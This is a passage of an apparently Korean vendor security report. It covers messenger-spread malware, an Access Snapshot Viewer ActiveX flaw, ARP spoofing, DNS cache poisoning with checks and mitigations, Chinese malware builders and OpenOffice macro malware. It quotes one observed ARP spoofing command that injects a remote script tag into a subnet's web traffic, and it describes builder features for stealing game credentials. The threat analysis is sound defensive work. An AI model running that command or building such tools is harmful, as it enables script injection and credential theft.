30 (3) 시큐리티 네이트온쪽지를이용한악성코드전파 SK커뮤니케이션즈에서운영중인네이트닷컴쪽지서비스사용자들의 ID와 Password가유출돼악성코드를유포하는쪽지가발송되어많은사용자들이악성프로그램에의해피해를입었다. 그리고 MS Office Access의 Snapshot Viewer ActiveX Control 취약점이발표되었으며, 많은사이트에 Snapshot 취약점을이용한악성코드들이심어져있는것으로보인다. Nate On 쪽지를이용한악성코드전파 네이트쪽지서비스사용자들의 ID 와 Password 가유출되어악성코드를유포하는데악용되 었다. 공격자는아래 [ 그림 2-16] 과같은쪽지를보내어사용자를현혹하는방식을택하고 있다. [ 그림 2-16] 악성코드유포하는 Nate On 쪽지내용 [ 그림 2-16] 에서보듯이공격자는이미지파일인것처럼속여사용자가그림파일을클릭하 도록유도한다. 자세히보면실제 URI 가그림파일의주소가아닌것 ( 자세히보면? 가포함 ) 을확인할수있다. URI 에서? 다음에나오는값은사이트에전송하는변수값을의미한다. 즉위 URL 을풀 어쓰면, 로변경할수있음을알수있다. 즉 index.html 의변수값으로 abcd.jpg 라는값이들어가는것이다. 위의링크를클릭하게되면, 해킹된웹서버로접속되며, 실행파일을다운로드받는데, 30
31 WinRAR SFX 파일로아래의 4개파일을포함하고있다. 26.exe (27,091 바이트 ) 80.exe (82,432 바이트 ) error.jpg (11,656 바이트 ) : 강아지사진 kiagen.exe (10,240 바이트 ) [ 그림 2-17] 악성코드실행중보여지는이미지 악성코드를실행시키게되면, error.jpg 라는강이지사진이보여지며, 백그라운드로트로이 목마와게임핵등의악성코드가동작하게된다. MS Office Access 의 Snapshot Viewer ActiveX Control 취약점 Microsoft Access Snapshot Viewer 의 ActiveX 컨트롤은표준또는런타임버전의 Microsoft Office Access 없이 Access 보고서 Snapshot 을볼수있는기능을제공하는데, 이 ActiveX Control 에서취약점이발견되어공격을받은여러사이트에서공격코드가발견되고있으며, 점차적으로그수가늘어나고있는상황이다. 31
32 [ 그림 2-18] Snapshot Viewer ActiveX Control 공격코드 위의 [ 그림 2-18] 과같이아주간단한공격코드로취약한브라우저가위의공격코드가 삽입된사이트를방문할경우, 또는메일을읽을경우공격자에의해컴퓨터의모든권한을 빼앗길수있다. 해당취약점은 Microsoft Access Snapshot Viewer 에서사용하는 ActiveX(snapview.ocx) 의프로퍼티 SnapShotPath 와 CompressedPath 값을올바르게처리하지못하는과정에서발생한다. 이취약점은 Microsoft Office Access 2000, Microsoft Office Access 2002, Microsoft Office Access 2003 의 Snapshot Viewer 에사용되는 ActiveX 컨트롤에만영향을준다. 이 ActiveX 컨트롤은지원되는모든 Microsoft Office Access 버전 (Microsoft Office Access 2007 제외 ) 에함께제공되며, 독립실행형 Snapshot Viewer 에서도제공되므로위제품이설치된컴퓨터는업데이트를꼭해야한다. ARP Spoofing S 공격의증가 어김없이 7 월에도 ARP Spoofing 공격이지속적으로발생하고있다. 현재공격방식은취약한브라우저를통해 ARP 공격을수행하는악성프로그램을다운로드받도록하는형태이다. 공격자는사이트를옮겨가며, 지속적으로악성코드를배포하고있으며, 끊임없이변종을내놓고있는실정이다. 최근공격의예로, 공격자는인증서관리자도구 (certmgr.exe) 를통하여 services.exe 파일을실행시키고다음코드를실행시킨다. C:\WINDOWS\system32\svchost.exe -idx 0 -ip x.x.x.1-x.x.x.255 -port 80 -insert "<script src= 삭제 /js/1.js></script>" 32
33 이로인해같은네트워크에물려있는모든컴퓨터는웹서핑을하는동안 ARP 공격에 의해 HTML 코드안에악성스크립트를삽입되는형태로공격을받게된다. 33
34 (4) 네트워크모니터링현황 최근 7 월한달동안네트워크모니터링시스템으로부터탐지된상위 Top 5 보안위협들은 다음과같다. 대부분과거마이크로소프트사의공개된취약점을이용하고있으며, 광범위하 게퍼지는새로운취약점이발표되기이전까지는이러한경향이계속유지되리라추정된다. 과거공개된취약점을이용하는공격사례가끊이지않고있으므로사용자들은반드시최신 패치를설치하여잠정적보안위협을사전에방어해야한다. 순위취약점명 1 MS DCOM RPC Vulnerability 2 MS Microsoft SQL Server Vulnerability 3 MS Local Security Authority Subsystem Service(LSASS) Vulnerability 4 MS Server Service Vulnerability 5 MS Plug-and-Play Vulnerability [ 그림 2-19] 7월상위 TOP 5 보안위협취약점 지난달순위에랭크되지못했던 MS Microsoft SQL Server 공격취약점 1 은상위 2 위로순위에재진입하였으며, 지난달순위를차지했던 MS ASN.1 코드실행취약점 2 은이달에는순위에서벗어났다. MS Microsoft SQL Server 공격취약점은 Microsoft SQL 서버를대상으로 UDP/1434 포트로 376 바이트의패킷을대량전송하여트래픽과부하로인한서비스거부
35 공격 (Denial of Service) 을야기하는슬래머 (Slammer) 웜의형태로최근까지지속적으로트 래픽이감지되고있다. [ 그림 2-20] 에나타난바와같이주요공격포트트렌드를살펴보면, 지난달에이어 NetBIOS와관련한 TCP/445, TCP/139, TCP/135 포트가상위랭크를차지하였으며해당취약점은 MS03-026, MS04-011, MS06-040과같다. 앞서보안위협취약점상위에랭크된 SQL 취약점의영향으로 TCP/1433 포트는비교적큰수치로공격포트트렌드부분에서도상위 2위를차지하였다. 또한, 악성코드를다운로드하기위해이용되는 TFTP 서비스로인하여 UDP/69 포트에대한트래픽이주요공격포트에랭크되었다. [ 그림 2-20] 7 월상위 TOP 5 공격포트 공격발생지별국가현황을살펴보면, 지난달에비해한국 (KR) 이감소하고미국 (US) 이증가하였으나여전히상위권순위에는영향을미치지못하였다. 한국은다수의공격대상지가되었으며또한공격의결과로악성코드에감염되면서또다른공격을시도하는경유지역할을함으로써공격발생지국가에서상위를차지하는것으로추정된다. 중국이 11위로 10위권내에랭크되지못하였으나, 주의깊게지켜보아야할국가일것이다. 중국의순위가네트워크모니터링에서이와같이낮은이유는, 네트워크모니터링에유입되 는트래픽이특정목표를가진공격트래픽보다는전체적인공격을시도하는트래픽이므로, 중국발웹해킹과같은트래픽이모니터링되지못하기때문으로추정된다.. 35
36 순위 국가 순위 국가 1 KR 47% 6 TW 3% 2 JP 17% 7 PH 3% 3 US 14% 8 SG 2% 4 HK 6% 9 ZA 2% 5 IN 5% 10 AU 1% [ 그림 2-21] 공격국가별순위및비율 DNS Cache Poisoning 취약점에따른네트워크현황 DNS Cache Poisoning 취약점은조작된 DNS 쿼리를다량으로전달하여 DNS 캐쉬서버의내용을임의로변경할수있게한다. 그결과, 요청된주소의정상적인 IP주소가아닌공격자가지정한 IP 주소를가지고 DNS 캐쉬를변경할수있으므로악성코드가설치된임의의 IP 주소로사용자를유도할수있어매우위험하다. 취약점은 7월 24일 ( 한국시간 ) 공격코드가공개되었고, 7월 30일 ( 한국시간 ) 실제피해사례가보고되었다. [ 그림 2-22] DNS 포트 (UDP/53) 에대한트래픽추이 36
37 위그래프에서볼수있듯이해당취약점을이용한패킷증가는현재네트워크모니터링시스템을통해서탐지되고있지는않지만, 대부분의시스템은인터넷사용을위해 DNS 시스템을이용하기때문에이에대한각별한주의가필요하다. 해당취약점은컬럼부분을통해보다자세한정보를제공하고있다. 37
38 (5) 중국보안이슈 새로운버전으로등장한넷봇 (NetBot) 일반적으로중국언더그라운드에서제작되는악성코드제작툴이나해킹에사용되는공격툴의경우누구나사용할수있는무료버전과다양한고급공격기능이포함되어상용으로판매되는 VIP 버전이존재한다. 이러한무료버전과상용버전을통틀어서최근중국언더그라운드에서가장주의깊게지켜봐야할툴중하나가바로넷봇 (NetBot) 이라할수있다. 올 3월경발생한한국내금융업체의홈페이지와이번 7월에발생한특정포털사이트에대한분산서비스거부공격이바로넷봇에의해발생한것으로알려졌기때문이다. 지난 6월중순경넷봇제작그룹은 4.0대의최신버전의넷봇을개발하였으며본글을쓰고있는 8월 6일현재새로운 5.0 버전을판매하고있다. 새로운버전들에서는한국웹사이트에만특화된공격기능들이포함된것으로알려져분산서비스거부공격등에대한각별한주의가필요하다. [ 그림 2-23] NetBot.DDOS.Team 의웹사이트에한국어로설명된넷봇의기능들 넷봇 VIP 4.0은분산서비스거부공격에사용되는좀비 (Zombie) 시스템에설치되는서버파일과이좀비시스템들을조종하는클라이어트파일을생성할수있다. 해당툴을이용하여 FSG로실행압축된넷봇트로이목마악성코드를제작할수있으며, 해당트로이목마가실행되면 DLL 파일 1개를생성하여정상시스템프로세스인 winlogon.exe에인젝션 (Injection) 하게된다. 그후트로이목마를생성할당시에지정한 IP 주소로역접속을시도하여공격자의명령에따라서다양한공격들을시도하게된다. 해당넷봇 VIP 4.0 툴에의해서생성되는트로이목마들은 V3에서 Win-Trojan/Agent AE 로진단하고있다. 38
39 중국산악성코드생성툴 우리는최근발간된 ASEC 리포트를통해서중국언더그라운드그룹에의해서다양한악성코드제작툴과해킹에사용되는공격툴들이매우많이제작되고있는것을확인하였다. 이러한툴들의공통점은악성코드제작자들이과거만큼의고급프로그램개발실력이없더라도다양한형태의악성코드들을짧은시간에대량으로양산할수있게해준다는것으로아래 [ 그림 2-24] 와같이공격에사용될수있는다양한기능들을옵션으로제공하고있는실정이다. [ 그림 2-24] 비천주다운로더생성기 [ 그림 2-24] 는 7 월초에제작된비천주다운로더형태의트로이목마생성기이다. 해당트로 이목마는다음과같은악의적인기능들을제공하고있어악성코드제작자들의편의를꾀하 고있다. 1. 악성코드가생성될폴더설정 : 윈도우폴더또는시스템 32 폴더에트로이목마의복 사본을선택에따라서생성할수있다. 2. 다른악성코드의다운로드할위치 : 감염된시스템에다른악성코드를다운로드할 위치를임시 (Temp) 폴더또는다른폴더에할것인지지정할수있다. 3. 실행압축형태선택 : 생성할악성코드를 Upack 또는 FSG 로실행압축할것인지 선택할수있어악성코드파일자체를보호할수있다. 39
40 4. 다양한악의적인기능들의옵션제공 : 다운로드를시도할시간간격을공격자의선택에따라서초단위로지정할수있으며 안전모드부팅 을방해할기능, 관리목적공유폴더로의전파, 보안프로그램에서후킹되는 SSDT를원상태로복구할것인지, 보안프로그램을강제종료할것인지등의다양한악의적인기능들을체크박스를통해서복합적으로선택할수있다. 5. 감염된시스템의통계수집 : 해당생성기로생성된악성코드에얼마나많은시스템이감염되었는지확인할수있도록정보를전송하는웹사이트의주소를지정할수있다. 해당악성코드생성기에의해서생성되는트로이목마들은모두 V3 에서 Win- Trojan/Hupigon.Gen 으로진단가능하다. [ 그림 2-25] 는 2007년 6월경에제작된중국산온라인게임인대화서유2의사용자정보와암호를유출하는트로이목마생성기이다. 해당트로이목마생성기는붉은색박스에공격자가트로이목마에의해확보된온라인게임사용자정보와암호를전송할웹사이트의주소를지정할수있다. [ 그림 2-25] 대화서유 2 온라인게임관련트로이목마생성기 [ 그림 2-25] 와같이특정온라인게임의사용자정보를유출하는트로이목마생성기외에도 아래 [ 그림 2-26] 과같이온라인게임 3 종류에서범용적으로사용가능한트로이목마생성 기도존재하였다. 40
41 [ 그림 2-26] 완미국제, 무림외전, 문도온라인게임용트로이목마생성기 [ 그림 2-26] 의트로이목마생성기는완미국제, 무림외전과문도라는중국산온라인게임모두에서사용가능하며가로챈사용자정보를공격자에게전달하는방식역시웹사이트와전자메일둘중하나또는모두선택할수있도록되어있다. 1번의체크박스는웹사이트전송을원할경우에사용이가능하며각각의온라인게임사용자정보를전송하는웹사이트주소모두각각다르게설정할수있도록되어있으며 2번의체크박스의경우전자메일을통해서전달받기를원할경우사용할수있다. 전자메일의경우역시각각의온라인게임사용자정보가전송될전자메일주소를모두다르게설정할수있다. 중국언더그라운드에서알려진공격코드들 이번 7 월에는중국언더그라운드에서악의적인공격에사용가능한다양한공격코드들이 발견되어프로그램들에대한보안패치의중요성에대해서다시한번인식하게만들고있다. MS Office Snapshot Viewer ActiveX 공격코드공개이번 7월 7일마이크로소프트에서발표한 Office Snapshot 뷰어에대한취약점을공격할수있는공격코드가 7월 8일에중국언더그라운드에공개되었다. [ 그림 2-27] 중국언더그라운드웹사이트에게시된공격코드일부 마이크로소프트의보안패치발표가된하루뒤에바로이러한공격코드가공개되었다는 41
42 것은익히알려진바와같이공격코드의제작시간이점점빨라지고있다는것을증명하는것으로분석할수있다. 그러므로사용하는운영체제뿐만이아니라평소사용하는모든프로그램에대한보안패치설치를생활화하여야만불의의보안사고를사전에예방할수있을것이다 중국검색엔진 Baidu 웹사이트의 XSS 취약점 7월 13일경중국내에서가장많이사용되는검색웹사이트인바이두 (Baidu) 웹사이트에존재하는크로스사이트스크립트 (XSS) 취약점이중국언더그라운드웹사이트에알려지기시작하였다. 최초해당공격코드는 QQ 메신저를통해서급속하게전파되었으며이후대부분의언더그라운드해킹그룹의웹사이트에공격코드가공개되었다. [ 그림 2-28] 중국언더그라운드웹사이트에게시된바이두 (Baidu) 의 XSS 공격코드일부 중국포털신나왕웹사이트에서발견된취약점 7 월 18 일경중국의대형포털사이트중하나인신나왕에서배포하는엑티브엑스에임의의 파일을다운로드할수있는취약점이발견되었다. 42
43 [ 그림 2-29] 중국신나왕에서배포하는엑티브엑스취약점의공격코드일부 해당공격코드는신나왕에서배포하는엑티브엑스에존재하는취약점으로이로인해공격자 는해당엑티브엑스가사용하는클래스아이디값을이용하여외부시스템에존재하는다른 악성코드를다운로드한후실행할수있다. 폭풍영음 2008 베타 1 에서발견된취약점 중국내에서동영상재생프로그램으로많이사용되고있는폭풍영음의 2008 베타1 버전의특정파일에서버퍼오버플로우 (Buffer Overflow) 취약점이 7월 20일경중국언더그라운드에서알려지게되었다. 특히나이번취약점은아직보안패치가발표되지않은제로데이 (0- Day) 공격이라는점에서중국내의많은사용자들을불안하게하였다. [ 그림 2-30] 중국동영상재생프로그램인폭풍영음의취약한코드일부 해당취약점으로인해임의의파일을실행할수가있게되어인터넷익스플로어를통해서 악성코드를유포하고해당프로그램의취약점을이용해악성코드를실행할수도있다. 43
44 III. ASEC 컬럼 (1) DNS(Domain Name System) 의 Cache Poisoning 취약점 인터넷을사용하기위해꼭필요한것중대표적인것이일반적으로사람이인지하고있는도메인네임과인터넷상에연결된시스템의 IP를매핑시켜주는 Domain Name System(DNS) 이다. 하지만이를아는사람은많지않을것이고, DNS가없다면아마인터넷사용은굉장히불편해지거나, 아예사용하지못하게될지도모른다. 이러한중요한역할을하는 DNS에취약점이발견되어전세계적으로이슈가되고있다. 이번취약점은 IOActive의 Dan Kaminsky가발견하여올해초 DNS 프로토콜을사용하는많은업체들과이문제를해결하기위하여노력하였고, 7월초이취약점에대하여부분적으로공개하였다. 8월 7일보안컨퍼런스인블랙햇 (BlackHat) 에서세부적인내용을공개하려고하였으나, 7월 24일에이미취약점을이용한공격코드가공개되면서이를악용한공격이나오지않을까우려되는상황이다. 이취약점은기존에알려진 DNS Cache Poisoning의공격방법의하나로서새로운형태의공격방법은아니다. 지금까지알려진 DNS Cache Poisoning 방법은많은양의데이터를보내서공격을하기때문에탐지되기도쉽고, 공격자체의성공률이높지않았지만, 이번발표된취약점은좀더쉬운방법으로 DNS Cache의내용을변조할수있다. DNS 란무엇인가? DNS를설명하기전에먼저인터넷을하면서 IP주소라는것을많이들어보았을것이다. IP주소는인터넷에연결된시스템을구별하기위하여각각의시스템에유일하게부여된 4바이트의숫자 (IPv4 기준 ) 를의미하는것으로, 인터넷을이용한통신을위하여출발지 (Source) 에서목적지 (Destination) 로의패킷을라우팅하기위해사용된다. 이러한 IP 주소, 예를들어 와같이많이사용되는몇개의 IP 주소는쉽게기억 할수있을지몰라도, 수많은 IP 주소를일일이기억하는것은매우어려운일이될것이고, 인터넷사용역시굉장히불편해질것이다. 그래서우리는 IP 주소대신 IP 주소를가리키는 도메인이름을사용한다. 즉, DNS 는호스트의도메인이름을호스트의네트워크주소로바 꾸거나그반대의변환을수행할수있도록개발된시스템이다. 이러한 DNS 는 2 개의컴포 넌트인클라이언트와서버로구성되어있으며, 클라이언트가도메인주소에대해서버에게 쿼리를보내면서버가 DNS 시스템의데이터베이스를참조하여이에해당하는네트워크 IP 주소를응답해준다. 44
45 [ 그림 3-1] Web Site 접속과정 [ 그림 3-1] 에서사용자가 주소입력창에 이때브라우저는 example.com의주소를 DNS 서버에질의하여, example.com의 IP주소를얻어오게된다. 브라우저는해당 IP주소를이용하여, example.com 서버에접속하게되고, 요청 / 응답을통해웹서핑을하게되는것이다. ( 여기서중요한부분은도메인이름으로서버에직접접속하는것이아니라 DNS를통해 IP를얻고 IP주소를이용하여접속한다는것이다.) DNS Cache 란? DNS Cache 서비스는 DNS 서버에대한동일한 DNS 쿼리를반복적으로수행하지않도록쿼리에대한응답을일정시간동안저장하여불필요한네트워크트래픽을감소시키고 DNS 서비스에대한성능을향상시키기위해제공되는서비스이다. 서비스는다음과같은구조로동작한다. 1. 클라이언트가 Cache DNS 서버에게쿼리를보낸다. 2. 서버에 Cache된정보가존재하는경우, 바로응답하고, 존재하지않는경우, 신뢰된다른 DNS 서버에게쿼리를재전송한다. 3. 신뢰된다른 DNS 서버로부터응답을전달받는다. 4. 전달된응답을클라이언트에게전달하고 Cache 데이터베이스에응답을저장한다. DNS Cache Poisoning 공격이란? DNS Cache Poisoning 공격은 DNS 서버 Cache 에잘못된정보를기록하도록유도하는공 45
46 격으로, 공격자는조작된쿼리요청 (DNS 데이터를위 / 변조하는공격 ) 을통하여수행할수 있다. DNS Cache Poisoning 을설명하기위해 [ 그림 3-1] 에서설명한 DNS 서비스에대하 여보다자세하게살펴볼필요가있다. [ 그림 3-2] DNS Resolution 1. 의 IP 주소를얻기위해먼저자신의컴퓨터에있는 Cache를확인한다. (hosts 파일포함, ex> ipconfig /displaydns 명령을통해 Cache 확인가능 ) 2. 로컬컴퓨터의 Cache에서어떠한엔트리도발견하지못했기때문에자신이설정해놓은 DNS 서버에다시물어본다. 3. DNS 서버는서버내의로컬 Cache에서 존재하지않은경우반복적으로 DNS 서버들에질의하는과정을시작한다. 4. DNS 질의는인터넷의 ROOT 서버들중하나로보내진다. 요청을받은 ROOT 서버는.com 인터넷공간에대해신뢰할수있는서버의주소를알려준다. 5. DNS 질의가.com에대해신뢰할수있는서버로보내진다. example.com 도메인에대해신뢰할수있는 DNS 서버의주소가리턴된다. 6. DNS 질의가 example.com에신뢰할수있는서버로보내진다. 의 IP 주소가리턴된다 IP 주소는애초요청했던클라이언트에게보내지고, 응답받은 Local cache에저장된다. [ 그림 3-2] 와같은여러단계를거처서특정도메인에매핑되는 IP 주소를얻어올수있다. 46
47 [ 그림 3-3] DNS Cache Poisoning [ 그림 3-3] 에서보는바와같이 DNS Cache Poisoning 공격은 1-6 단계를거치고 DNS 서버 에정보를돌려주기전에공격자는신뢰된사이트라속이고계속해서잘못된 IP 를로컬 DNS 서버에전송한다. 이러한손쉬운공격에 DNS Cache Poisoning 공격이성공하지못하도록 DNS 서비스에몇가지보안기능이내장되어있다 - Transaction ID가랜덤화 : 공격이성공하기위하여 DNS 서버가외부 DNS 서버에질의한 Transaction에대하여공격자는 Transaction ID를알아야하지만그렇게어렵지않다. 왜냐하면 Transaction ID를특정한범위내에서랜덤화시키기때문에공격자는무차별대입을통해공격에성공할수있다. - Source port 매칭 : 현재의대부분의 DNS서버는 Source Port 번호가처음부팅할때부터다시서버를재시작하기전에는바뀌지않는다. 즉공격자는쉽게 Source Port 번호를획득할수있다. 위의두가지보안수단들을하나씩제거하고, IP 주소를공격자가원하는주소로변조한다. 이렇게변조된도메인에대한 IP 주소는 DNS서버의 Cache에저장되고, 다른클라이언트들이도메인에대해 IP주소를요청할때, 잘못된 IP 주소를알려주게되며, 이것은엔트리가삭제될때까지지속된다. 이와같이 DNS Cache Poisoning 을공격에의해, DNS 서버가잘못된 IP 주소를알려준다면 아래와같은문제가발생할수있다. 47
48 - 개인정보가로채기 : 일단공격자는 example.com과동일한사이트를만들어놓는다. 그다음 DNS Cache Poisoning을시도하여 example.com의 IP주소를공격자서버 IP 주소로바꿔놓을것이다. 사용자는잘못된 IP주소를 DNS로부터받아 example.com에접속하게될것이다. Example.com에접속한사용자는평소와같이 id, password를입력하게될것이고입력과동시에공격자손에넘어갈것이다. Id/password뿐만아니라사용자정보를입력하거나다양한정보입력을통해많은정보를빼낼수있을것이다. - Malware 유포 : 특정서버의 IP주소를 DNS Cache Poisoning을통해변경하고, 그주소로접속한사용자들을감염시킨다. 공격자는웹페이지내부에 IFRAME을삽입하여, 접속한사용자시스템에악성코드를설치하게된다. - 거짓정보유포 : 신뢰성있는사이트로위장하여, 거짓정보를흘려, 주식가격을조작하거나, 사회에대한불신또는정치적목적으로도사용될수있다. - Man-in-the-middle Attack: 공격자서버에 Proxy서버를두어, 일반사용자로하여금자신의서버를거쳐다른정상사이트와통신하게한다. 이는공격자가실제사용자와정상사이트와의모든통신내용을가로챌수있게한다. ( 웹사이트정보, 개인정보, 채팅내용, 기타등등 ) - 전자상거래사이트위장 : 공격자가쇼핑몰같은사이트를위장하여, 다른사이트보다물건들을싸게내놓고, 일반사용자로하여금상품금액을가로채는행위를할수있다. 위공격들은사용자가정상적으로도메인을입력하고접속했기때문에아무도의심하지못 할것이다. 이는심각한결과를초래할수있다. DNS Cache Poisoning 공격사례 이번취약점을악용한사례가미국시간기준 2008년7월29일 ( 화 ) 에보고되었다. 미국의대형 ISP(Internet Service Provider) 기업중의하나인 AT&T 사의 DNS Cache 서버에발생한것으로, 세부사항은이번취약점의공격코드를만든 HD Moore가근무하는 BreakingPoint Systems사를통하여알려졌다. 이번사건을좀더자세히살펴보면, BreakingPoint 사의내부 DNS가 AT&T 사의 DNS를이용하도록포워딩설정되어있었고, 공격자는미국의오스틴과텍사스지역의 AT&T DNS에공격시도를하여 주소가변조된 이는 IFRAME 주소 4개가삽입되어있었기때문이었다. 4 개중 1 개는 Google 주소였기때문에실제적으로는 3 개가문제지만, 악성코드를설치하는 것은아니었기때문에직접적인피해는없었다. 하지만이번사례는일반기업의 DNS 가 48
49 아니라많은사람들이이용하는 ISP 의 DNS 를대상으로했다는점과실제로이번취약점을 이용하여공격에성공하였다는점에서주목을받았다. DNS Cache Poisoning 취약한지확인 OARC 에서제공하는기능을통하여다음과같이쿼리를통해확인을해볼수있다. 결과가 GOOD 또는 POOR 로간단하게확인이가능하다. < 취약한경우 > $ 네임서버주소 +short porttest.dns-oarc.net TXT " 네임서버 is POOR: 40 queries in 6.3 seconds from 1 ports with std dev 0.00" < 정상인경우 > $ 네임서버주소 +short porttest.dns-oarc.net TXT " 네임서버 is GOOD: 26 queries in 0.1 seconds from 26 ports with std dev " 또는 nslookup 을이용하여다음과같이도가능하다. $ nslookup -type=txt -timeout=30 porttest.dns-oarc.net 네임서버주소 취약점을발견한 Dan Kaminsky 블로그의 'DNS Checker' 기능이용 "Check My DNS" 를통해확인이가능하다. 만약다음과같은문구가나온다면사용하고있는 DNS 서버가취약점에노출되어있는것이다. "Your name server, at xxx.xxx.xxx.xxx, appears vulnerable to DNS Cache Poisoning." DnsStuff 의취약점확인기능을이용 를방문하면자동으로체크하여준다. 취약한경우다음과같은메시지를준다. "The DNS server at xxx.xxx.xxx.xxx is vulnerable!" DNS Cache Poisoning 공격방어 DNS Cache Poisoning 공격을막기위해서는우선적으로최신버전의 DNS 를사용하거나 49
50 현재버전에서패치를적용하여해결한다. 이번취약점에대한해당패치는다음 [ 표 3-1] 과같다. 벤더마이크로소프트 ISC BIND 시스코레드햇우분투 Gentoo 데비안 OpenBSD FreeBSD NetBSD SUSE Linux 썬마이크로시스템즈 이외이번취약점의영향을덜받기위해서는다음과같은작업 1,2 을수행할수있다. - DNS 서버의용도와서비스에따라필요치않은경우 DNS 서버의 Recursion 기능을중지하도록한다. - Recursion 기능을사용할경우특정신뢰할수있는호스트로제한한다. - 안전한 DNS 사용을위한보안정책을적용한다. - DNS 서버의버전을숨긴다. 1 Disable recursion on the DNS server : 패치 url ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa txt.asc [ 표 3-1] DNS 취약점패치 url 2 Open DNS 보안조치가이드 ( 50
51 - BIND 8/9 의경우 'recursion no', 'allow-recursion' 옵션을이용할수있 다.( Recursion 을사용하지않을경우 Zone 파일에지정된도메인이외의일반적인 쿼리가동작하지않으므로해당기능의사용을정확히인지한후사용하여야한다 ) 결론 DNS Cache Poisoning 공격은큰위협이되는취약점이다. 우리나라의경우 ISP 에의존적 으로 DNS 사용이굉장히높으므로좀더관심을기울이고, 적극적으로대처한다면이번취 약점은무난히지나갈것으로예상된다. 51
52 (2) 오픈오피스와악성코드 OpenOffice.org ( 이하오픈오피스 ) 는줄여서 OOo, OO.o 등으로도불리며 현재국내에서오픈오피스가마이크로소프트사의 MS오피스나한글과컴퓨터사의한글과컴퓨터오피스에비해널리사용되지는않고있지만무료라는점, 마이크로소프트오피스 포맷을지원한다는장점과데이터교환을위해고유파일포맷으로 ISO 표준인오픈도큐먼트포맷 (ODF) 를지원 1 하는등의여러가지이유로조금씩사용비중이높아져가고있다. 이런오픈오피스도명성을쫓는악성코드제작자들을피해가기는어려웠는지 2007년 5월 22 일보안업체와외신을통해오픈오피스에서활동하는최초의악성코드 ( 배드버니-BadBunny) 가보고되었다. 이글에서는오픈오피스의보안적인측면과배드버니에대해알아보겠다. 오픈오피스 오픈오피스는 1980년대중반독일의스타오피스슈트 (StarOffice suite) 로시작되어 1999년썬마이크로시스템즈 (Sun Microsystems, 이하썬 ) 에합병되어 2000년 6월스타오피스 5.2 가공개되었다. 2000년 10월 13일스타오피스 6.0를시작으로오픈오피스프로젝트에사용되어오픈오피스 1.0이 2002년 4월 30일탄생한다. 현재는썬에서오픈소스프로젝트를진행하고있으며, 윈도우, 리눅스, 매킨토시버전이존재한다. 한국어웹사이트도존재하며 ( 테스트에사용된오픈오피스버전 은설치파일크기는 113 메가바이트이다. 기본적인테스트는한글윈도우 XP 서비스 팩 2 혹은 3 에오픈오피스한글판 2.2 와 2.4 를사용했다. 오픈오피스문서구조 오픈오피스문서는 MS 오피스 2007과마찬가지로 ZIP 형식의압축파일로되어있다. 실제오픈오피스문서를 ZIP 파일로변경하면압축해제프로그램에서압축을풀수있다. 이는오픈도큐먼트 (OpenDocument, ODF) 에따른것으로원래오픈오피스에서만들고구현한 XML 파일포맷을바탕으로 OASIS(Organization for the Advancement of Structured Information Standards) 컨소시엄이표준화한것이라고한다 D%8A%B8 52
53 [ 그림 3-4] ZIP 으로묶여있는오픈오피스문서파일 이와같이 XML 형태로제작된문서는오피스간파일호환도가능하지만과거오피스문서 파일이자체파일포맷을사용함으로써파일포맷을변경하여악의적인코드를수행하게하 는유형의공격으로부터의공격가능성도대폭낮춰보안성을높일수있다. 오픈오피스매크로 현재오픈오피스는 MS 오피스의 VBA(Visual Basic for Application) 매크로와호환되지않아 MS 오피스에포함된매크로가실행되지않는다 1. 오픈오피스는 VBA 대신자체적인매크로를지원하고있는데, 크게오픈오피스베이직 (OpenOffice.org Basic), 자바스크립트 (JavaScript), 빈쉘 (BeanShell), 파이썬 (Python) 을지원한다. 오픈오피스는기본적으로매크로의기능을막아두었기때문에, 스크립트나매크로를포함한 문서를열경우사용자에게경고메시지를보인다. [ 그림 3-5] 매크로포함문서를열때발생하는경고 1 노벨에서제공하는 go-oo버전에서는 VBA 매크로가호환되어가포함되어있다고한다.( 53
54 2.4 버전에서는매크로를기본적으로막아두었기때문에사용자가매크로를사용하려면매크로보안기능을 높음 에서 중간 으로낮춰야한다. 보안수준을낮춘후문서를열면보안경고창이뜬다. 이때 매크로활성화 를선택하면매크로를실행할수있다. 하지만, 매크로실행을위해서는 JRE(Java Runtime Environment) 가필요하다는메시지가뜨지만무시해도기본적인매크로는사용가능하다. 매크로는실행은사용자가 도구 (T) 매크로 (M) 매크로실행 (U) 을선택해매크로를실 행할경우실행된다. 오픈오피스베이직은 내매크로. 오픈오피스매크로 와현재열린문서의매크로가기본이 된다. 내 매크로는 C:\Documents and Settings\[ 사용자이름 ]\Application Data\OpenOffice.org2\user\basic\Standard 폴더에 저장된다. 기본 파일 이름은 Module1.xba 이다. 오픈오피스에서매크로기능을사용하기위해서는설정할사항이많으므로대다수사용자는 매크로사용을하지않고매크로기능이필요한사람만선택적으로사용할것이다. 악성코드제작환경 오픈오피스매크로는기술적으로악성코드에필요한다음기능을제공하고있어악성코드제작이가능하다. - 파일생성, 복사, 실행, 삭제기능 - 오픈오피스의매크로를이용해외부실행파일실행 실제간단히파일생성, 복사, 실행, 삭제를테스트해서매크로를실행할수있는상황이면 적어도트로이목마류의악성코드는제작할수있다. 54
55 [ 그림 3-6] 매크로기능을이용한파일생성, 복사, 실행, 삭제테스트 다행히오픈오피스는매크로기능을기본적으로막아둬매크로기능을잘모르는사용자는 악성코드피해를받을가능성이낮다. 하지만, 매크로가수행될경우에는악성코드제작에 필요한기능을제공하고있어악성코드제작가능성은존재한다. 배드버니분석 오픈오피스악성코드로는오픈오피스드로우 (OpenOffice Draw) 에서제작된악성코드가 2007 년 5 월발견되었다. 일반에퍼지지않고기술적으로제작이가능함을증명하는개념증 명 (Proof of concept) 악성코드이다. 감염된문서를열어볼때실제매크로는 Basic\Standard 의 badbunny.xml 파일이다. 55
